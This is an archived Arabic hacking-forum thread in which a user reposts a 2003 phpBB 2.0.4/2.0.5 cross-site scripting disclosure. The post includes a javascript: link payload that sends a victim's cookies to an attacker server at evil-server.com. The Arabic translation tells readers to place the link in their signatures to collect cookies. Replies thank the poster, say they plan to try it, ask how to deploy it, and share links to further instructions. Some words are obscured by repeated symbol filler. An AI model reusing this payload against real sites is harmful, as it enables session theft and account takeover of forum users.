ثغره جديده في منتديات phpBB [الأرشيف]

مشاهدة النسخة كاملة : ثغره جديده في منتديات phpBB

TaZ HaCkEr

10-09-2003, 06:17

المصدر : Security Focus

I have found a dangerous vunlerability in phpBB.
I've verified that versions 2.0.5 and 2.0.4 (AFAIK the two latest versions)
are affected, but probably more versions are vulnerable.

If HTML is enabled for postings, a user can post a link like this:

<a
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_&@#&@#&@#&@#&@#&@#='

+ document.&@#&@#&@#&@#&@#&@#);">Click me, I'm innocent</a>

If a user clicks it, his &@#&@#&@#&@#&@#&@# will be sent to the attacker, which he
can use to log on as the user if autologon is enabled.

ترجمه : حصلت ثغره خطيره في phpBB وقد وتحققت منها على الاصداره

2.0.5 و 2.0.4

اذا كان HTML ممكن في التواقيع , ضع في توقيعك لينك مثل هذا

<a
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_&@#&@#&@#&@#&@#&@#='

+ document.&@#&@#&@#&@#&@#&@#);">Click me, I'm innocent</a>

اذا ضغط عليه سوف يرسل الكوكيز اليك ...

TaZ

ThE_X

10-09-2003, 07:25

مشكور اخي تاز

دعباس

10-09-2003, 11:45

يسلموووووو تاز

:)

سلام

sNoOop HaCkEr

11-09-2003, 12:10

ألف شكر لك اخي تاز
على الثغره وان شاء الله بجربها وبردلك خبر

تــــــحــــــيــــــاتـــــــي...

اوسكار

11-09-2003, 01:18

السلام عليكم

ممكن خدمه اخوي بسل سوال يعني اط الكود من غير ماغير فيه شي ولا في وصلات مثلا اغيرها وتشكر على مجهودك الطيب وياريت يكون الشرح مفصل اشوي عشان تعم الفايده للجميع

القرصان

11-09-2003, 01:34

شرح لمثل هذه الثغرات واللإستفاده منها

http://www.3asfh.com/vb/showthread.php?s=&postid=23037#post23037

|4|

خالد7

11-09-2003, 05:37

الف شكر ياتاز والف شكر للقرصاان على التوضيح

TaZ HaCkEr

11-09-2003, 06:45

خالد7 & القرصان & اوسكار & sNoOop HaCkEr & دعباس & MAKS

مشكورين على الرد ياحبايبي |1|

Smart c0d3r

11-09-2003, 08:51

تازوه والنعم فيك مشكور على الثغرة :D

اخوي القرصان مشكور على التوضيح

ولكم تحياتي |4|

TaZ HaCkEr

11-09-2003, 10:33

المتمكن منووووووور المووضوع ياقمر:)

ورود القبر

12-09-2003, 12:46

ممكن تفسرلي على اي اساس انه رح يوصل لي ؟
عل وين رح يصل ؟
واذا على الايميل كيف و هو ماله موجود ؟
هل ينفع اني احطه في موقع ؟
كيف ممكن احطه مع صوره ؟

TaZ HaCkEr

12-09-2003, 12:57

http://www.3asfh.com/vb/attachment.php?s=&postid=23031

silent storm

13-09-2003, 07:31

تسلم أخوي تاز
الف شكر لك يالغالي:)

LoOoLHaCkEr

13-09-2003, 09:45

يعطيك العافية على الثغرة الحلوة;)

one Time hackin

18-09-2003, 06:57

:D:D:D مشكوور يا تاز على الثغره لكن والله انا ماني فاهم اي شي بس اقلب راسي على غير سنع :D:D
تشاااااااااااااو|4||4|

TaZ HaCkEr

20-09-2003, 01:06

one Time hackin & LoOoLHaCkEr & silent storm

ميرسي ياحلوين على التكرم بالرد:)